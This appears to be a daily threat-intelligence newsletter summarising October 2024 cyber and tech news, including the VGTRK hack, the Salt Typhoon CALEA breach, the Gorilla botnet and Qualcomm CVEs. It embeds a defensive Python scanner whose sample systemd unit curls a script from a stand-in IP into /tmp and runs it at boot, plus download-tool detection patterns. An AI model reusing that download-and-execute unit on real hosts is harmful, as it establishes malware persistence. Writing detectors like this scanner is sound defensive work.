Daily Drop (884): Foxconn: MX | AI Drone: SAR | CN: Exploit CALEA | VGTRK | U.S. Water Provider: MyPay | Brent Crude Surge | Lazarus GRP | Qualcomm DSP Vul | Gorilla Botnet | CN: Nvidia | Gaudi 3 |
10-08-24
Tuesday, Oct 08 2024 // (IG): BB // ScraperDaddy // Cloud Email Harvester
Pro-Ukraine Hackers Disrupt Russian State Media Company VGTRK in Major Cyberattack
Bottom Line Up Front (BLUF): Pro-Ukraine hackers launched a cyberattack against Russia's state broadcasting company VGTRK, disrupting broadcasts on channels such as Russia 1 and Russia 24 for nearly an hour and reportedly deleting data from VGTRK’s servers. Russian officials have condemned the incident as part of a “hybrid warfare” campaign allegedly supported by Western interests.
Analyst Comments: This incident highlights the intensifying cyber conflict between pro-Ukrainian and pro-Russian actors, where attacks on media outlets have become symbolic strikes against governmental influence. The breach of VGTRK—a key vehicle for Russian state messaging—represents a shift in the digital battle toward disrupting information channels directly. If confirmed, destroying backup data could signal an evolution in hacktivist tactics, focusing more on persistent operational damage. The incident may fuel Russia’s push for international cybersecurity discussions at the U.N. as it seeks to frame the narrative as part of a broader anti-Russian campaign.
FROM THE MEDIA: On October 7, pro-Ukraine hackers reportedly carried out an "unprecedented" cyberattack on VGTRK, Russia’s state media organization. Although the company’s spokesperson initially claimed minimal impact, local reports indicate that broadcasts were disrupted on VGTRK’s primary channels for nearly an hour, and data, including backups, was allegedly deleted from VGTRK servers. This attack, attributed to the pro-Ukraine hacktivist group Sudo rm-RF, follows similar disruptions to Russian media in recent months. Russian Foreign Ministry representative Maria Zakharova described the incident as part of a Western “hybrid warfare” strategy, suggesting that Russia may address the issue with international bodies such as the U.N. and UNESCO.
READ THE STORY: The Record
China Encourages AI Buyers to Opt for Local Alternatives Over Nvidia Amid Rising Tech Independence Efforts
Bottom Line Up Front (BLUF): Chinese authorities are encouraging domestic organizations to prioritize local AI accelerator options, such as Huawei, instead of Nvidia, although no official restrictions have been imposed. This guidance aligns with China's recent push to bolster local tech capabilities amid ongoing international trade and tech tensions.
Analyst Comments: This development is part of a broader trend in China’s technological policy aimed at reducing dependence on foreign tech, particularly from U.S. companies. As U.S. export controls on high-performance chips tighten, China’s recommendation to use Huawei products indicates its focus on developing self-sufficient AI infrastructure. Although Huawei’s current AI chips reportedly fall short of Nvidia’s, continued investment and development in domestic technology could eventually reduce China’s need for foreign AI accelerators, potentially impacting Nvidia’s revenue in the region.
FROM THE MEDIA: According to anonymous sources cited by South China Morning Post, Chinese authorities are informally advising organizations to choose locally developed AI accelerators, notably those from Huawei, over Nvidia products. This comes as U.S.-based Nvidia prepares to release its new Blackwell AI chips, widely considered leaders in the field. China Telecom recently highlighted its capacity for training large language models on homegrown hardware, signaling progress toward self-reliant AI compute power. This guidance from Chinese authorities reflects a continued push for domestic alternatives in the face of U.S. restrictions on advanced semiconductors and AI hardware.
READ THE STORY: The Register
Vulnerable APIs and Bot Attacks Lead to $186 Billion in Annual Business Losses
Bottom Line Up Front (BLUF): A recent report by Imperva and Marsh McLennan highlights the financial and operational risks companies face due to vulnerable APIs and bot attacks. Global businesses incur losses estimated at $94–$186 billion annually. With API-related incidents rising by 40% in 2022 and bot-driven attacks surging by 88%, large enterprises are particularly at risk of significant financial and reputational damage.
Analyst Comments: The growing interdependency between APIs and bot-driven attacks is reshaping the threat landscape, particularly for large organizations with extensive digital infrastructures. These attacks are often fueled by generative AI, which amplifies attackers’ capabilities to bypass standard defenses. As reliance on APIs intensifies, especially among enterprises pursuing digital transformation, these vulnerabilities may evolve into a primary security focal point. Collaborating across departments will be critical to developing comprehensive API and bot management strategies to contain risks and secure organizational assets.
FROM THE MEDIA: According to The Economic Impact of API and Bot Attacks report by Imperva, businesses are losing billions annually due to API vulnerabilities and bot-driven cyberattacks. APIs, which facilitate data exchange and operational efficiency, have introduced new attack vectors as companies integrate hundreds of endpoints into their operations. In 2022, API-related security incidents climbed by 40%, while bot attacks surged by 88%, contributing to $116 billion in bot-related losses. Bots are primarily responsible for credential stuffing, online fraud, and DDoS attacks, with Imperva noting that automated threats now drive 30% of API attacks. With their complex digital ecosystems, large enterprises are three times more likely to experience API abuse and bot attacks than smaller businesses. Imperva recommends a collaborative approach, incorporating API security and bot management into a comprehensive defense strategy to address these escalating threats.
READ THE STORY: THN
AI-Enhanced Drones Revolutionize Search and Rescue with Successful Deployment in Scotland
Bottom Line Up Front (BLUF): Two British Mountain Rescue volunteers have developed AI-driven software that automates drone searches for missing persons, and it has already located a missing hiker in Scotland. This breakthrough in drone technology provides rapid, thorough area coverage, bringing new hope to search and rescue missions, particularly in remote or treacherous terrain.
Analyst Comments: This innovation marks a significant step forward in using AI to enhance public safety efforts, reducing search times and the physical toll on rescue personnel. The drone software’s ability to autonomously identify “unusual” colors and features against natural backdrops is especially useful in mountainous regions where conventional visual searches struggle. The success of this technology may prompt broader adoption of automated, AI-enhanced tools across rescue and emergency services globally, likely sparking further advancements in autonomous drone capabilities for challenging search scenarios.
FROM THE MEDIA: In a groundbreaking application of AI in search and rescue, British Mountain Rescue volunteers Dan Roach and David Binks developed an automated drone software capable of locating missing persons with heightened efficiency. The system was deployed in Glencoe, Scotland, following the disappearance of hiker Charlie Kelly. Despite extensive search efforts involving traditional teams and equipment, Kelly remained missing for over a month until Binks and Roach’s software located him within an hour. By automating flight paths and image analysis, the drone software allows rapid area coverage, flagging color clusters that differ from the natural landscape. This AI-driven solution has already shown significant promise, locating Kelly in a hard-to-see gully by identifying his clothing colors as anomalies in the dense, rocky terrain.
READ THE STORY: Wired
Inflection AI Chooses Intel's Gaudi 3 Over Nvidia GPUs for New Enterprise Platform
Bottom Line Up Front (BLUF): Inflection AI is shifting its latest enterprise offering to run on Intel’s Gaudi 3 accelerators rather than Nvidia GPUs, citing improved price performance. With Intel’s Tiber AI Cloud hosting the platform, the company aims to offer AI-powered solutions to enterprises at a lower cost. However, on-premises options will be available for clients requiring local data storage.
Analyst Comments: Inflection AI's adoption of Gaudi 3 highlights the potential shift toward more cost-effective AI accelerators as Intel competes to gain traction in the GPU market traditionally dominated by Nvidia. Intel's aggressive pricing strategy, combined with Gaudi 3’s competitive performance, could make Intel a viable option for companies balancing budgets with computational demands. However, with Nvidia’s next-gen Blackwell GPUs on the horizon, Intel may face an uphill battle in maintaining this momentum. Inflection’s choice also underscores the rising demand for diverse, customizable AI infrastructure options in enterprise settings.
READ THE STORY: The Register
Gorilla Botnet Unleashes 300,000 DDoS Attacks Across 100 Countries, Exploiting Apache Hadoop YARN Vulnerability
Bottom Line Up Front (BLUF): The newly identified Gorilla botnet, based on the Mirai source code, has conducted over 300,000 Distributed Denial of Service (DDoS) attacks globally, targeting sectors from government and banking to telecoms. Armed with multiple DDoS methods and exploiting vulnerabilities in Apache Hadoop YARN, the botnet has attacked devices in over 100 countries, with notable impact in the U.S., Canada, Germany, and China.
Analyst Comments: The Gorilla botnet’s emergence emphasizes the persistent threat posed by Mirai-based malware variants. By integrating the Apache Hadoop YARN exploit, Gorilla expands its attack surface significantly, highlighting the need for updated vulnerability patching, especially in IoT and cloud infrastructure. The botnet’s deployment of encryption methods akin to the Keksec group suggests that Gorilla may leverage sophisticated techniques to evade detection and maintain long-term control. Given its broad attack capabilities, this botnet could prompt heightened DDoS protections and an increased focus on securing cloud-based architectures and IoT devices.
FROM THE MEDIA: Gorilla, a new botnet derived from the infamous Mirai botnet code, launched over 300,000 DDoS attacks across 100 countries between September 4 and September 27, 2024. Discovered by NSFOCUS, the botnet primarily deploys UDP, SYN, and ACK flood techniques to target institutions across multiple sectors, including government, telecom, and gaming. With support for ARM, MIPS, x86_64, and x86 CPU architectures, the botnet exploits a known Apache Hadoop YARN vulnerability to achieve remote code execution on IoT and cloud systems. Persistence mechanisms in Gorilla involve creating a custom service to trigger downloads of malicious scripts on each startup, potentially enabling sustained and undetected control over infected systems. Researchers also report that the botnet’s activity includes encryption similar to that used by the Keksec group to hide crucial data.
READ THE STORY: THN
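The story above says Gorilla persists by creating a custom service that downloads malicious scripts on each startup. The scanner below is an added defender-side example, not code from NSFOCUS or the article, and it assumes hosts managed by systemd: it parses unit-file text and flags units whose Exec* directives call a download tool, reference a URL, or run from a world-writable directory. The sample units and the 203.0.113.5 address are constructed for the demo.

```python
"""Flag systemd units whose Exec* lines download or run remote content at boot.

Added example (not from the NSFOCUS report): a defender-side check for the
persistence mechanism attributed to Gorilla, a custom service that fetches
malicious scripts on every startup. Assumes systemd-managed hosts.
"""
import re

# Constructed sample unit files for the demo, not real Gorilla artifacts.
SAMPLE_UNITS = {
    "/etc/systemd/system/nginx.service": """[Unit]
Description=nginx web server
[Service]
ExecStart=/usr/sbin/nginx -g 'daemon off;'
[Install]
WantedBy=multi-user.target
""",
    "/etc/systemd/system/sysupdate.service": """[Unit]
Description=System Update
After=network-online.target
[Service]
ExecStartPre=/bin/sh -c "curl -fsSL http://203.0.113.5/x.sh -o /tmp/.x"
ExecStart=/bin/sh /tmp/.x
Restart=always
[Install]
WantedBy=multi-user.target
""",
}

DOWNLOADERS = re.compile(r"\b(?:curl|wget|tftp|ftpget)\b")
URL = re.compile(r"\b(?:https?|ftp|tftp)://\S+")
WORLD_WRITABLE = re.compile(r"\s/(?:tmp|var/tmp|dev/shm)/")
EXEC_KEYS = {"ExecStart", "ExecStartPre", "ExecStartPost", "ExecReload"}

def exec_lines(unit_text):
    """Yield (key, value) for Exec* directives inside the [Service] section."""
    section = None
    for raw in unit_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section == "Service" and "=" in line:
            key, value = (s.strip() for s in line.split("=", 1))
            if key in EXEC_KEYS:
                yield key, value

def scan_unit(unit_text):
    """Return a list of reasons a unit looks suspicious (empty if clean)."""
    reasons = []
    for key, value in exec_lines(unit_text):
        if DOWNLOADERS.search(value):
            reasons.append(f"{key} invokes a download tool: {value}")
        if URL.search(value):
            reasons.append(f"{key} references a URL: {value}")
        # Leading space so an absolute path at the start of the value also matches.
        if WORLD_WRITABLE.search(" " + value):
            reasons.append(f"{key} runs from a world-writable directory: {value}")
    return reasons

def scan_all(units):
    """Scan a {path: text} mapping; return {path: reasons} for flagged units only."""
    results = {}
    for path, text in units.items():
        reasons = scan_unit(text)
        if reasons:
            results[path] = reasons
    return results

if __name__ == "__main__":
    # On a real host, build the mapping from /etc/systemd/system/*.service files.
    for path, reasons in scan_all(SAMPLE_UNITS).items():
        print(path)
        for reason in reasons:
            print("  -", reason)
```

Findings are a triage list, not a verdict: legitimate updaters also fetch over HTTP, so review each flagged unit's ExecStart target and its owner before acting.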
Chinese Hackers Exploit CALEA Backdoors in U.S. Telecom Networks for Data Collection
Bottom Line Up Front (BLUF): China-backed hacking group Salt Typhoon reportedly breached U.S. telecom providers’ wiretap systems, likely accessing extensive data from American telecom users. These intrusions expose critical vulnerabilities in the Communications Assistance for Law Enforcement Act (CALEA)-mandated backdoors, which were designed for lawful surveillance but have now become points of exploitation by foreign actors.
Analyst Comments: The compromise of CALEA wiretap systems underscores the inherent risks of government-mandated backdoors in critical infrastructure. By exploiting these backdoors, Salt Typhoon has potentially accessed massive amounts of private data, undermining U.S. national security. This incident may push U.S. lawmakers to reconsider policies on mandated surveillance access and encourage encryption and security measures that resist backdoor entry. The incident will likely fuel ongoing debates in the EU, where backdoor requirements are under legislative review, emphasizing the risk of these vulnerabilities in any nation’s digital infrastructure.
FROM THE MEDIA: According to recent reports from the Wall Street Journal, pro-China hackers from the group Salt Typhoon have penetrated wiretap infrastructure in multiple major U.S. telecom companies, including AT&T, Lumen, and Verizon. Mandated under CALEA, these wiretap systems allow authorized access for law enforcement but have now been exploited to collect American internet traffic and other sensitive data. Security experts, including Matt Blaze and Riana Pfefferkorn, note that these backdoors have long been considered high-risk attack points. Blaze labeled the breach as an inevitable consequence of CALEA's requirements. This incident is seen as potentially catastrophic, as Salt Typhoon’s involvement signals possible intent for strategic data collection in anticipation of future U.S.-China conflicts. The breach has reignited calls for enhanced encryption and secure, backdoor-free systems.
READ THE STORY: TC
Qualcomm Advises OEMs to Patch Exploited DSP and WLAN Vulnerabilities in Critical Update
Bottom Line Up Front (BLUF): Qualcomm has issued security patches to fix critical vulnerabilities in its DSP and WLAN components, urging original equipment manufacturers (OEMs) to update immediately. The DSP flaw, CVE-2024-43047, is actively exploited, potentially in spyware attacks, while a WLAN flaw, CVE-2024-33066, carries a high risk of memory corruption.
Analyst Comments: The DSP and WLAN vulnerabilities highlight the growing security challenges in digital signal processing and wireless components, areas often overlooked in mobile security. Qualcomm’s proactive patch for CVE-2024-43047, reportedly exploited in targeted attacks, suggests that high-risk entities, like civil society members, may be impacted. The involvement of organizations like Google’s Threat Analysis Group and Amnesty International Security Lab further implies sophisticated exploitation likely employed in surveillance or espionage operations. These vulnerabilities are a critical reminder of the necessity for timely OEM patch deployment across the Android ecosystem to prevent escalating risks.
FROM THE MEDIA: Qualcomm released patches addressing nearly two dozen vulnerabilities, including CVE-2024-43047, a high-severity DSP Service flaw, and CVE-2024-33066, a critical WLAN vulnerability. CVE-2024-43047, identified by Google Project Zero and confirmed as exploited in targeted attacks by Amnesty International, is a use-after-free bug in DSP components that leads to memory corruption. Qualcomm has distributed patches to OEMs, emphasizing prompt implementation to mitigate further risk. The CVE-2024-33066 WLAN flaw, with a CVSS score of 9.8, allows unauthorized memory access through improper input validation. The update coincides with Google’s Android security bulletin, which includes fixes for additional vulnerabilities from MediaTek and Imagination Technologies.
READ THE STORY: THN
Cyberattack Forces American Water to Shut Down Customer App, Billing System
Bottom Line Up Front (BLUF): American Water, the largest U.S. regulated water provider, recently took its MyWater customer billing app offline following a cyberattack. Although the company isolated affected networks and stated that water quality remains uncompromised, it suspended billing operations and engaged law enforcement to investigate.
Analyst Comments: This incident reflects broader concerns about the vulnerability of U.S. water utilities, which continue to face both ransomware and state-sponsored threats. Recent attacks on other water systems underscore the security gap within critical infrastructure, which is often reliant on legacy operational technology (OT) and under-resourced cybersecurity programs. Strengthening OT security standards and oversight may be essential to prevent future disruptions threatening service availability and public trust.
FROM THE MEDIA: On October 7, American Water confirmed it had disconnected parts of its network and paused the MyWater app in response to a cybersecurity incident discovered on October 3. The company, which serves over 14 million U.S. residents, filed an SEC 8-K report stating that water supply and quality are unaffected. Officials also stated that they isolated compromised areas to prevent the attack’s spread and are actively investigating alongside law enforcement. American Water reported that no customer data breaches or operational disruptions have been detected, but they declined to disclose whether ransomware was involved. This event highlights ongoing efforts by agencies, including the EPA, to enhance cybersecurity protocols in critical sectors like water and wastewater, which remain highly susceptible to cyber threats.
READ THE STORY: The Record
Brent Crude Surges Above $80 Amid Middle East Tensions and Hurricane Risks
Bottom Line Up Front (BLUF): Brent crude oil prices jumped above $80 per barrel this week as investors reacted to potential supply disruptions from both geopolitical tensions in the Middle East and Hurricane Milton’s threat to U.S. Gulf Coast production. The potential for Israeli strikes on Iranian oil infrastructure and hurricane-related shutdowns has amplified supply concerns, propelling oil prices to their highest levels since August.
Analyst Comments: The latest surge in Brent crude highlights the oil market's sensitivity to geopolitical and natural disruptions, particularly with low spare production capacity. The risks posed by ongoing Middle East tensions could lead to prolonged volatility, especially if hostilities between Israel and Iran escalate, jeopardizing the Strait of Hormuz. This scenario could propel prices even higher, while Gulf Coast weather disruptions add further uncertainty. The oil market may see sustained upward pressure, particularly if any supply outages are significant and prolonged, leaving OPEC in a critical balancing role.
FROM THE MEDIA: Oil prices rallied on Monday as Brent crude surpassed $80 a barrel, fueled by concerns over escalating conflict in the Middle East and Hurricane Milton’s approach to U.S. Gulf Coast oil facilities. The Israeli government has reportedly considered targeting Iranian oil facilities following last week’s missile attack by Iran-aligned forces. Meanwhile, Hurricane Milton, now a Category 5 storm, has prompted Chevron to evacuate personnel and halt operations on one of its platforms. Hedge funds have adjusted their short positions in response to rising prices, indicating a shift toward bullish positions on oil. West Texas Intermediate crude also rose, crossing $77 per barrel. Analysts, including those at Goldman Sachs, warn that any sustained disruptions could drive prices even higher.
READ THE STORY: FT
U.S. Government Seeks to Reclaim $2.67 Million from North Korean Lazarus Group Crypto Heists
Bottom Line Up Front (BLUF): The U.S. government is taking legal action to seize over $2.67 million from North Korea's Lazarus Group, believed to be responsible for multiple high-profile cryptocurrency thefts, including the Deribit and Stake.com hacks. These lawsuits mark the latest in the U.S. Department of Justice’s efforts to recover digital assets stolen by North Korean cyber operatives.
Analyst Comments: The Lazarus Group's continued success in high-profile cryptocurrency thefts underscores the challenges of tracking and seizing digital assets in the crypto space. Although the U.S. has had some success in freezing illicit funds, the fact that large portions still evade capture highlights a persistent risk for crypto platforms. This situation may prompt exchanges and crypto wallet providers to reconsider security protocols and increase collaboration with law enforcement. With North Korea allegedly funding its state operations through such activities, ongoing recovery efforts will likely be central to U.S. policy in countering the North's cyber aggression.
FROM THE MEDIA: The Department of Justice has filed lawsuits to recover over $2.67 million in digital assets pilfered by North Korea's Lazarus Group, known for its sophisticated cybercrime operations. The first lawsuit targets $1.7 million in Tether linked to the 2022 Deribit hack, in which $28 million was stolen. The Lazarus Group laundered these funds through various mixers, including Tornado Cash, until authorities managed to freeze the assets in five wallets. A second lawsuit involves the Lazarus Group’s theft of $41 million from Stake.com, an online gambling platform. The stolen funds were moved through Bitcoin mixers, including Sinbad and Yonmix, before being distributed across virtual exchanges. Both cases form part of a broader U.S. government investigation into North Korean cybercrime, which has reportedly generated millions of dollars in illicit funds over the past decade. This investigation has linked Lazarus Group to other high-profile crypto thefts, including the $234.9 million WazirX breach.
READ THE STORY: The Register
Items of interest
Foxconn to Build World’s Largest Nvidia Superchip Facility in Mexico for Blackwell Platform Demand
Bottom Line Up Front (BLUF): Foxconn is constructing the world’s largest facility for Nvidia’s Blackwell Superchips in Mexico, addressing surging demand for AI infrastructure. The Taiwanese manufacturer, known for producing Apple’s iPhones, aims to leverage this AI-driven demand to expand its reach in advanced server manufacturing.
Analyst Comments: Foxconn’s expansion into Nvidia’s Blackwell production is a significant move, reinforcing the company’s strategy to pivot from consumer electronics towards AI and EV markets. This venture highlights Mexico's growing importance in global tech supply chains and Foxconn's readiness to support the AI revolution through advanced cooling and infrastructure innovations. With Nvidia's Blackwell chips forecasted to generate billions in Q4 revenue, Foxconn is positioned to capture substantial value from the burgeoning AI sector, which could catalyze further diversification, including its commitment to EV manufacturing.
FROM THE MEDIA: Foxconn announced plans to build the world’s largest Nvidia Superchip production facility in Mexico, specifically for Nvidia’s upcoming Blackwell platform, at its annual tech day in Taipei. Nvidia began shipping samples of Blackwell chips in August, anticipating strong market uptake by Q4. Benjamin Ting, Foxconn’s senior VP, emphasized that demand for Blackwell technology is unprecedented, with customers across sectors preparing for AI-driven transformations. Foxconn’s Mexico plant, a $500 million investment in Chihuahua, will integrate the advanced cooling systems needed for AI hardware. Foxconn’s chairman, Young Liu, expressed confidence in the company’s ability to lead AI server manufacturing, a sector driving the company's recent record quarterly revenue.
READ THE STORY: The Edge
Foxconn to invest US $241M in AI server manufacturing in Chihuahua (Video)
FROM THE MEDIA: Taiwanese electronics giant Foxconn has announced a $241.2 million investment to boost AI server production at its Ciudad Juárez plant in Chihuahua, Mexico. The facility, known as Planta Óscar Flores, has been manufacturing AI servers since 2005 and is part of Foxconn’s strategy to expand its regional operations. This investment is set to enhance Mexico’s role in AI technology development.
Foxconn, Nvidia team up to build 'AI factories' (Video)
FROM THE MEDIA: Foxconn Chairman Liu Young-way and Nvidia CEO Jensen Huang said their companies would build ‘AI factories’ together, creating a new kind of data center for a range of applications including self-driving cars.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.